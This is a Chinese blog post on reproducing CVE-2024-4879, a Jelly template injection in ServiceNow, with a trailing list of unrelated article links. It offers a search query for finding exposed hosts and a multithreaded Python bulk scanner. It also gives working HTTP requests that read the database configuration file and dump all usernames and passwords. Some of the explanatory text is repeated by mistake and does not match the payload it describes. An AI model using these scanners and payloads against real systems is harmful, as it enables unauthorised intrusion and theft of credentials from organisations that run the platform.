【漏洞复现】ServiceNow UI Jelly模板注入(CVE-2024-4879)

        声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

ServiceNow是一家专注于提供企业级云计算服务的企业,其旗舰产品是基于云的服务管理解决方案,旨在协助各组织简化及自动化其业务流程。然而,该公司的Jelly模板和Glide表达式存在安全漏洞,这使得未经授权的攻击者有机会通过构建恶意请求来利用这些漏洞,进而实现远程代码的执行。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:web.body="ConditionalFocus.jsdbx"

2.使用poc批量扫描

# 导入所需库
import requests
import argparse
import threading
import queue
import os
from requests.exceptions import RequestException
from datetime import datetime
import urllib3
import signal
import sys# 禁用安全警告
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# 定义颜色代码
dimmed_gray_color = '\033[90m'
honey_yellow_color = "\033[38;5;214m"
dim_yellow_color = '\033[33;1m'
cyan_color = '\033[96m'
green_color = '\033[92m'
red_color = '\033[31m'
light_orange_color = '\033[38;5;214m'
reset_color = '\033[0m'# 显示横幅信息
def banner():print(f"""
{light_orange_color}                                                                      ______     _______     ____   ___ ____  _  _         _  _    ___ _____ ___  / ___\ \   / / ____|   |___ \ / _ \___ \| || |       | || |  ( _ )___  / _ \ 
| |    \ \ / /|  _| _____ __) | | | |__) ||| |_ _____||| |_ / _ \  / / (_) |
| |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____|__   _| (_) |/ / \__, |\____|  \_/  |_____|   |_____|\___/_____|  |_|          |_|  \___//_/    /_/ {reset_color}-> Bulk scanning tool for ServiceNow CVE-2024-4879 vulnerability.{reset_color}
{reset_color}{dimmed_gray_color}-> By x.com/MohamedNab1l
{light_orange_color}-> Use Wisely.{reset_color}
""")# 日志目录和文件路径
LOG_DIR = 'logs'
LOG_FILE = os.path.join(LOG_DIR, 'scan.log')# 创建日志目录
def create_log_dir():if not os.path.exists(LOG_DIR):os.makedirs(LOG_DIR)print_message('info', f"Log directory created: {LOG_DIR}")# 记录日志信息
def log_message(message):with open(LOG_FILE, 'a') as log_file:log_file.write(f"{datetime.now().strftime('%Y-%m-%d %H:%M:%S')} - {message}")# 打印不同级别的消息
def print_message(level, message):if level == 'vulnerable':print(f"{cyan_color}[VLUN] {message}{reset_color}")if level == 'info':print(f"{dimmed_gray_color}[INFO] {message}{reset_color}")elif level == 'success':print(f"{green_color}[VLUN] {message}{reset_color}")elif level == 'warning':print(f"{honey_yellow_color}[WARNING] {message}{reset_color}")elif level == 'error':print(f"{red_color}[ERROR] {message}{reset_color}")log_message(message)# 需要检查的路径,包含漏洞利用代码
paths_to_check = "/login.do?jvar_page_title=<style><j:jelly xmlns:j=\"jelly\" xmlns:g='glide'><g:evaluate>gs.addErrorMessage(7*191);</g:evaluate></j:jelly></style>"# 发起请求并获取响应内容
def make_request(url):try:response = requests.get(url, verify=False)if response.status_code == 200:return response.textelse:return Noneexcept requests.RequestException as e:return None# 测试目标URL是否受漏洞影响
def test_host(url):try:fullurl = f"{url}{paths_to_check}"body = make_request(fullurl)if body is not None and '>1337<' in body:print_message('vulnerable', f"Vulnerable: {url}")#print(body)else:print_message('warning', f"Not Vulnerable: {url}")except requests.RequestException as e:print_message('error', f"Timeout: {url}")# 工作线程函数,从队列中取出URL并测试其是否受漏洞影响
def worker(queue):while not queue.empty():url = queue.get()print_message('info', f"Testing {url}")test_host(url)queue.task_done()# 处理Ctrl+C信号,优雅退出程序
def signal_handler(sig, frame):print_message('error', 'You pressed Ctrl+C! Exiting gracefully.')sys.exit(0)# 主函数,解析命令行参数并执行相应的操作
def main():signal.signal(signal.SIGINT, signal_handler)banner()parser = argparse.ArgumentParser(description='Bulk scanning tool for ServiceNow CVE-2024-4879.')group = parser.add_mutually_exclusive_group(required=True)group.add_argument('-u', '--url', help='Target URL (e.g., http://example.com)')group.add_argument('-f', '--file', help='File containing list of URLs (one per line)')args = parser.parse_args()create_log_dir()if args.url:print_message('info', f"Testing single target: {args.url}")test_host(args.url)elif args.file:with open(args.file, 'r') as f:urls = [line.strip() for line in f if line.strip()]print_message('info', f"Testing multiple targets from file: {args.file}")url_queue = queue.Queue()for url in urls:url_queue.put(url)threads = []for _ in range(10):t = threading.Thread(target=worker, args=(url_queue,))t.start()threads.append(t)for t in threads:t.join()print_message('info', "Scanning complete.")if __name__ == '__main__':main()

cmd运行:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包:

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(111*111);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host:  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

 2.读取数据库配置

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

3.查看用户名密码

GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egr=new%20GlideRecord(%22sys_user%22);gr.query();s=%22%22;while(gr.next())s=s.concat(gr.user_name,%22%20:%20%22,gr.user_password,%22%3Cbr/%3E%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1
Host:  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

2.数据包分析 

1.构造数据包

1. 请求行:`GET /login.do?

请求参数jvar_page_title的值经过URL编码,解码后为:

<style><j:jelly xmlns:j="jelly" xmlns:g="glide"><g:evaluate>gs.addErrorMessage(111*111);</g:evaluate></j:jelly></style>

这里是一个典型的服务器端模板注入(SSTI)攻击。攻击者尝试通过篡改请求参数来注入恶意代码。具体来说:

  • <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
  • <j:jelly><g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
  • gs.addErrorMessage(111*111);是Jelly脚本的一部分,它执行了一个乘法运算并将结果添加到错误消息中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

2.读取数据库配置

  1. 请求参数jvar_page_title的值经过URL编码,解码后为:

    <style><j:jelly xmlns:j="jelly:core" xmlns:g="glide"><g:evaluate>z=new Packages.java.io.File("").getAbsolutePath();z=z.substring(0,z.lastIndexOf("/"));u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>

    这里是一个典型的服务器端模板注入(SSTI)攻击。

    • <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
    • <j:jelly><g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
    • z=new Packages.java.io.File("").getAbsolutePath();获取当前工作目录的绝对路径。
    • z=z.substring(0,z.lastIndexOf("/"));从绝对路径中移除最后一个斜杠及其后面的部分,得到父目录的路径。
    • u=new SecurelyAccess(z.concat("/co..nf/glide.db.properties")).getBufferedReader();尝试打开位于父目录下名为co..nf/glide.db.properties的文件,并创建一个BufferedReader对象来读取文件内容。
    • s="";while((q=u.readLine())!==null)s=s.concat(q,"\n");逐行读取文件内容,并将其拼接到字符串s中,每行之间用换行符分隔。
    • gs.addErrorMessage(s);将读取到的文件内容作为错误消息添加到系统中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

3.查看用户名密码

  1. 请求参数jvar_page_title的值经过URL编码,解码后为:
  2. <style><j:jelly xmlns:j="jelly" xmlns:g="glide"><g:evaluate>gr=new GlideRecord("sys_user");gr.query();s="";while(gr.next())s=s.concat(gr.user_name, " : ",gr.user_password,"<br/>");gs.addErrorMessage(s);</g:evaluate></j:jelly></style>
  3. 这里是一个典型的服务器端模板注入(SSTI)攻击。
  4. <style>标签被用来插入恶意代码,这样做可能是为了利用CSS的作用域来执行JavaScript代码。
  5. <j:jelly>和<g:evaluate>是Jelly模板引擎的标签,用于在服务器端执行Jelly脚本。
  6. gr=new GlideRecord("sys_user");创建一个名为sys_user的GlideRecord对象。
  7. gr.query();执行查询操作,获取所有用户记录。
  8. s="";while(gr.next())s=s.concat(gr.user_name, " : ",gr.user_password,"<br/>");遍历查询结果,并将用户名和密码拼接成一个字符串,每个用户的用户名和密码之间用冒号和换行符分隔。
  9. gs.addErrorMessage(s);将拼接好的字符串作为错误消息添加到系统中。这里的乘法运算看起来是无害的,但这可能是为了测试注入是否成功。在更复杂的攻击中,攻击者可能会执行更有害的操作,如读取文件内容、执行系统命令等。

3.结束跑路

1.构造数据包

2.构造数据包,读取数据库配置

3.查看用户名密码

每篇一言:要不断的移动像水一样,才不会变成死水一样,你要不断流动着!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/876426.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

视觉巡线小车(STM32+OpenMV)——总结

文章目录 目录 文章目录 前言 一、效果展示 二、完整流程 1、STM32CubeMX配置 2、Keil编辑 3、硬件接线 4、参数调试 5、图像处理调试 三、总结 前言 基于前面的系列文章&#xff0c;已基本介绍完了基于STM32OpenMV的视觉巡线小车&#xff0c;本文将以小编自己的小车…

SeaCMS海洋影视管理系统远程代码执行漏洞复现

SeaCMS海洋影视管理系统远程代码执行漏洞复现 Ⅰ、环境搭建Ⅱ、漏洞复现Ⅲ、漏洞分析 免责声明&#xff1a;请勿利用文章内的相关技术从事非法测试&#xff0c;由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失&#xff0c;均由使用者本人负责&…

全栈嵌入式C++、STM32、Modbus、FreeRTOS和MQTT协议:工业物联网(IIoT)可视化系统设计思路(附部分代码解析)

项目概述 随着工业4.0时代的到来&#xff0c;工业物联网&#xff08;IIoT&#xff09;在提高生产效率、降低运营成本和实现智能制造方面得到了广泛应用。本项目旨在开发一个全面的工业物联网监控系统&#xff0c;能够实时监测设备的温度、压力、振动和电流等参数&#xff0c;并…

【Python实战因果推断】60_随机实验与统计知识2

目录 An A/B Testing Example An A/B Testing Example 在许多公司中&#xff0c;一种常见的策略是提供廉价甚至免费的产品&#xff0c;这种产品本身可能并不盈利&#xff0c;但其目的是吸引新客户。一旦公司获得了这些客户&#xff0c;就可以向他们推销其他更盈利的产品&#x…

ThinkPHP一对一关联模型的运用(ORM)

一、序言 最近在写ThinkPHP关联模型的时候一些用法总忘&#xff0c;我就想通过写博客的方式复习和整理下一些用法。 具体版本&#xff1a; topthink/framework&#xff1a;6.1.4topthink/think-orm&#xff1a;2.0.61 二、实例应用 1、一对一关联 1.1、我先设计了两张表&#x…

[SWPU2019]Web1

上来看到两个功能&#xff0c;登录和注册&#xff0c;看到登录框直接sqlmap嗦一下 失败 注册admin显示被注册&#xff0c;那就注册一个账密都为aaa 登录进来发现两个功能点 发了一个广告却显示代管理确认&#xff0c;这里肯定没有管理员&#xff0c;所以我们得想办法自己上去a…

铲屎官的必备好物——希喂、352、米家养宠空气净化器分享

对于每一位深爱着家中萌宠的铲屎官而言&#xff0c;无尽的温情往往也伴随着日常生活中的小烦恼。那些不经意间飘散在空气中的毛发&#xff0c;偶尔缠绕在鼻腔或口腔中的细微触感&#xff0c;以及偶尔袭来的不明异味&#xff0c;都是与宠物共度的日子里不可或缺的一部分。幸好随…

聊聊RNNLSTM

RNN 用于解决输入数据为&#xff0c;序列到序列(时间序列)数据&#xff0c;不能在传统的前馈神经网络(FNN)很好应用的问题。时间序列数据是指在不同时间点上收集到的数据&#xff0c;这类数据反映了某一事物、现象等随时间的变化状态或程度&#xff0c;即输入内容的上下文关联…

基于Orangepi全志H616开发嵌入式数据库——SQLite

目录 一、SQLite数据库 1.1 SQLite 的特点&#xff1a; 1.2 SQLite 的使用场景&#xff1a; 1.3 SQLite数据库与传统MySQL数据库的区别&#xff1a; 二、SQLite数据库安装 2.1 SQLite数据库安装方式一&#xff1a; 2.2 SQlite数据库安装方式二&#xff1a; 三、SQLite数…

Nacos适配达梦数据库并制作镜像

背景&#xff1a;因项目需要信创&#xff0c;需将原本的mysql数据库&#xff0c;改成达梦数据库 一、部署达梦数据库 1.1 部署达梦数据库服务 可参考&#xff1a;Docker安装达梦数据库_达梦数据库docker镜像-CSDN博客 1.2 创建nacos数据库 create user SAFE_NACOS identifi…

放大电路总结

补充: 只有直流移动时才有Rbe动态等效电阻 从RsUs看进去,实际上不管接了什么东西都能够看成是一个Ri(输入电阻) Ri Ui/Ii Rb//Rbe Ui/Us Ri/(RiRs) Aus (Uo/Ui)*(Ui/Us) Au *Ri/(RiRs) 当前面是一个电压源的信号 我们就需要输入电阻更大 Ro--->输出电阻--->将…

VSCode+git的gitee仓库搭建

​ 在此之前你已经在gitee创建好了账号&#xff0c;并新建了一个仓库。 1. 安装 Visual Studio Code Visual Studio Code 是编辑 Markdown 和站点配置文件的基础&#xff0c;以下将其简称为 VSCode&#xff0c;你可以在它的 官方网站 下载到它。 如若不理解各个版本之间的区别…

【C++ —— 用一棵红黑树同时封装出map和set】

C —— 用一棵红黑树同时封装出map和set 总览RBTreeMyMapMySet 红黑树源代码红黑树模板参数的控制模板参数中仿函数的增加迭代器模拟1. 迭代器的定义和结构2. 迭代器的操作符重载 set模拟map模拟代码红黑树的代码set的代码map的代码 总览 RBTree enum Colour {RED,BLACK };//…

算法板子:Trie树——存储字符串、查找字符串的出现次数

#include <iostream> using namespace std;const int N 1e6 10;// Trie树是一个集合&#xff0c;可以存储字符串 // son二维数组中&#xff0c;每行代表一个节点&#xff0c;该行的每列都是它的儿子&#xff0c;最多26列代表一个节点最多26个儿子(题目中说了都是小写字…

photoshop学习笔记——选区3

从窗口面板可以打开历史记录面板&#xff0c;历史记录面板保存了所有的操作 可以点击历史记录中某一条&#xff0c;回到当时的操作状态&#xff0c;也可以通过编辑中的 还原、重做、切换到最终状态逐步调整或直接跳到最终状态 回退之后&#xff0c;如果有新的操作&#xff0c;历…

WordPress文章标题定制化前缀插件

引言 在当今互联网的海洋中&#xff0c;吸引读者眼球的第一步往往始于文章标题的设计。对于WordPress博主而言&#xff0c;如何让每篇文章的标题更加个性化和吸引人&#xff0c;成为了一项重要的任务。传统的自定义CSS方法虽然可行&#xff0c;但其繁琐的操作和有限的美学效果…

【高校科研前沿】浙江农林大学童再康教授等人在农林科学顶刊《CATENA》发文:长期覆盖作物可促进多养分循环和地下土壤碳封存

文章简介 论文名称&#xff1a;Long-term cover crops boost multi-nutrient cycling and subsurface soil carbon sequestration by alleviating microbial carbon limitation in a subtropical forest&#xff08;长期覆盖作物通过缓解亚热带森林中微生物的碳限制&#xff0c…

常见的jmeter面试题及答案

1、解释什么是JMeter? JMeter是一款Java开源工具&#xff0c; 用于性能负载测试。它旨在分析和衡量Web应用程序和各种服务的性能和负载功能行为。 2、说明JMeter的工作原理? JMeter就像一群将请求发送到目标服务器的用户-样。它收集来自目标服务器的响应以及其他统计数据&…

每日OJ_牛客_HJ91 走方格的方案数

目录 牛客HJ91 走方格的方案数 解析代码 牛客HJ91 走方格的方案数 走方格的方案数_牛客题霸_牛客网 解析代码 本题为求取路径总数的题目&#xff0c;一般可以通过递归求解&#xff0c;对于复杂的问题&#xff0c;可以通过动态规划求解。此题比较简单&#xff0c;也可以通过递…

Vue2和Vue3实战代码中的小差异(实时更新)

目录 前言1. 未使用自闭合标签2. 事件名连字符3. 换行符4. 弃用.sync 前言 以下文章实时更新&#xff0c;主打记录差异 1. 未使用自闭合标签 104:7 error Require self-closing on Vue.js custom components (<el-table-column>) vue/html-self-closing✖ 1 problem…